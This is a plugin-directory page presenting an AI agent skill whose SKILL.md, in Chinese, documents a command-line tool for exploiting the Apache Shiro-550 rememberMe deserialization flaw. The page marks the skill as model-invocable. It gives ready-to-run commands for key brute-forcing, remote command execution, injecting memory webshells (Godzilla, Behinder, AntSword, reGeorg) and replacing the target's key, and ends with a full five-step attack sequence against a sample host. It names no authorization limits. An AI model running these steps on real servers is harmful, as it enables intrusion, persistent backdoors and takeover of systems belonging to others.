Skill

shiro-attack-cli

CLI tool for Apache Shiro rememberMe deserialization exploit (Shiro-550, CVE-2016-4437). Supports detection, key cracking, gadget chain, command execution, memory shell, and key change.

security

npx claudepluginhub summersec/shiroattack2

Popularity

Stars

2,535

Forks

286

Invocation

How this skill is triggered — by the user, by Claude, or both

Slash command

/shiro-attack2:shiro-attack-cli

Not user invocable

Model invocable

Inline context

Default effort

Context Preview

The summary Claude sees in its skill listing — used to decide when to auto-load this skill

Shiro-550 漏洞利用命令行工具，从 fat JAR 直接运行，无需 GUI。

SKILL.md

148 lines · ~945 tokens

Similar Skills

shiro-attack-cli

2.5k

Detects, exploits, and tests Apache Shiro rememberMe deserialization vulnerabilities (Shiro-550/CVE-2016-4437). Supports key brute-force, gadget chain detection, command execution, memory shell injection, and key modification. Useful for security assessments of Shiro-based applications.

shiro-attack-cli

pentest-command-injection

Guides pentesting command injection, RCE, shell injection, deserialization (Java, .NET, Python, PHP), SSTI, Log4Shell with payloads, blind detection, bypasses, and checklists.

1 file

vuln-skills

exploiting-insecure-deserialization

Identifies and exploits insecure deserialization vulnerabilities in Java, PHP, Python, and .NET apps to achieve RCE during authorized penetration tests. Detects serialized data in traffic like cookies and parameters.

asi

Stats

LanguageJava

Stars2,535

Forks286

MaintenanceExcellent

Last CommitJun 4, 2026

Actions

View Source View Plugin View on GitHub View README

Help us improve

Share bugs, ideas, or general feedback.

Stats

Actions

Help us improve

Share bugs, ideas, or general feedback.

ShiroAttack2 CLI

Shiro-550 漏洞利用命令行工具，从 fat JAR 直接运行，无需 GUI。

启动方式

JAR="shiro_attack-5.1.1-all.jar"
CP="com.summersec.attack.CLI.MainCLI"
java -cp $JAR $CP <命令> [选项]

准备工作

下载 JAR

如果本地没有 jar，从 GitHub Releases 下载：

# 查看最新版本
curl -s https://api.github.com/repos/SummerSec/ShiroAttack2/releases/latest \
  | grep browser_download_url | grep all.jar | cut -d '"' -f 4

# 或用浏览器打开 https://github.com/SummerSec/ShiroAttack2/releases
# 下载 shiro_attack-*-all.jar 即可

准备 Key 字典

crack 命令需要 data/shiro_keys.txt。如果文件不存在，从 GitHub 下载：

mkdir -p data
curl -L -o data/shiro_keys.txt \
  https://raw.githubusercontent.com/SummerSec/ShiroAttack2/master/data/shiro_keys.txt

data/ 目录需放在运行 jar 的工作目录下。

命令

detect — 探测 Shiro

java -cp $JAR $CP detect -u <url> [-k <关键词>] [--cbc|--gcm] [--proxy <url>] [--timeout <秒>]

成功输出：[++] 存在shiro框架！

crack — 爆破/验证 Key

# 字典爆破（工作目录需有 data/shiro_keys.txt）
java -cp $JAR $CP crack -u <url> [--cbc|--gcm]

# 验证指定 Key
java -cp $JAR $CP crack -u <url> -K <base64_key> [--cbc|--gcm]

exec — 执行系统命令

java -cp $JAR $CP exec -u <url> -K <base64_key> -c <命令> [--cbc|--gcm] [-g <gadget>] [-e <回显>] [--json]

-K : Shiro AES Key (Base64)。必需。
-c : 要执行的系统命令。必需。
-g : Gadget 链类名。省略则自动探测（优先无 commons-collections 依赖的变体）。
-e : 回显类型：AllEcho（默认）、TomcatEcho、SpringEcho。

memshell — 注入内存马

java -cp $JAR $CP memshell -u <url> -K <base64_key> -t <类型> [--pass <密码>] [--path <路径>] [--cbc|--gcm]

-t : 内存马类型。必需。可选：哥斯拉[Filter]、哥斯拉[Servlet]、冰蝎[Filter]、冰蝎[Servlet]、蚁剑[Filter]、蚁剑[Servlet]、NeoreGeorg[Filter]、NeoreGeorg[Servlet]、reGeorg[Filter]、reGeorg[Servlet]
--pass : 内存马连接密码，默认 passwd
--path : 内存马 URL 路径，默认 /favicon.ico

changekey — 修改目标 Shiro Key

java -cp $JAR $CP changekey -u <url> -K <当前key> --newkey <新key> [--variant <变体>] [--cbc|--gcm]

--newkey : 新的 Shiro AES Key (Base64)。必需。
--variant : 注入路径变体，默认 filterConfigs -> shiroFilterFactoryBean。可选：filterConfigs -> shiroFilterFactoryBean、getFilterRegistration -> shiroFilterFactoryBean、filterConfigs -> 常见 Shiro 名依次匹配、getFilterRegistration -> 常见 Shiro 名依次匹配、filterConfigs -> 包含 shiro 的名称扫描、高风险: 全候选 rememberMeManager 扫描

gui — 启动图形界面

java -cp $JAR $CP gui

AES 模式

Shiro 版本	选项
≤ 1.2.4	`--cbc`
≥ 1.2.5	`--gcm`

JSON 输出

使用 --json 时日志行输出为结构化 JSON，命令执行结果仍以原始文本打印。

{"level":"info","msg":"[++] 存在shiro框架！"}
{"level":"success","msg":"[++] 找到key：kPH+bIxk5D2deZiIxcaaaA=="}
{"level":"info","msg":"[++] 发现构造链:CommonsBeanutilsString_183  回显方式: AllEcho"}

常见错误

[-] 响应含 rememberMe=deleteMe : Key 正确但反序列化失败，尝试更换 Gadget/回显组合或检查 AES 模式
[-] 未发现shiro框架 : 目标无 Shiro 或 Cookie 关键词不匹配，尝试 -k 修改关键词
[-] 测试:xxx -> 响应含 rememberMe=deleteMe : 该组合未命中，自动探测继续
[-] 利用链与回显全部测试完毕，未发现可用组合 : 所有链均失败，目标可能缺少必需依赖

完整流程示例

JAR="shiro_attack-5.1.1-all.jar"
CP="com.summersec.attack.CLI.MainCLI"
T="http://192.168.1.100:8080"

# 1. 探测 Shiro
java -cp $JAR $CP detect -u $T --cbc

# 2. 爆破 Key
java -cp $JAR $CP crack -u $T --cbc

# 3. 执行命令
java -cp $JAR $CP exec -u $T -K "kPH+bIxk5D2deZiIxcaaaA==" -c "whoami" --cbc

# 4. 注入内存马
java -cp $JAR $CP memshell -u $T -K "kPH+bIxk5D2deZiIxcaaaA==" -t 哥斯拉[Filter] --pass mypass

# 5. 修改 Shiro Key
java -cp $JAR $CP changekey -u $T -K "kPH+bIxk5D2deZiIxcaaaA==" --newkey "FcoRsBKe9XB3zOHbxTG0Lw=="

shiro-attack-cli

Popularity

Invocation

Context Preview

SKILL.md

Similar Skills

Help us improve

Help us improve

Find plugins for your project

shiro-attack-cli

Popularity

Invocation

Context Preview

SKILL.md

ShiroAttack2 CLI

启动方式

准备工作

下载 JAR

准备 Key 字典

命令

detect — 探测 Shiro

crack — 爆破/验证 Key

exec — 执行系统命令

memshell — 注入内存马

changekey — 修改目标 Shiro Key

gui — 启动图形界面

AES 模式

JSON 输出

常见错误

完整流程示例

Similar Skills

Help us improve

ShiroAttack2 CLI

启动方式

准备工作

下载 JAR

准备 Key 字典

命令

detect — 探测 Shiro

crack — 爆破/验证 Key

exec — 执行系统命令

memshell — 注入内存马

changekey — 修改目标 Shiro Key

gui — 启动图形界面

AES 模式

JSON 输出

常见错误

完整流程示例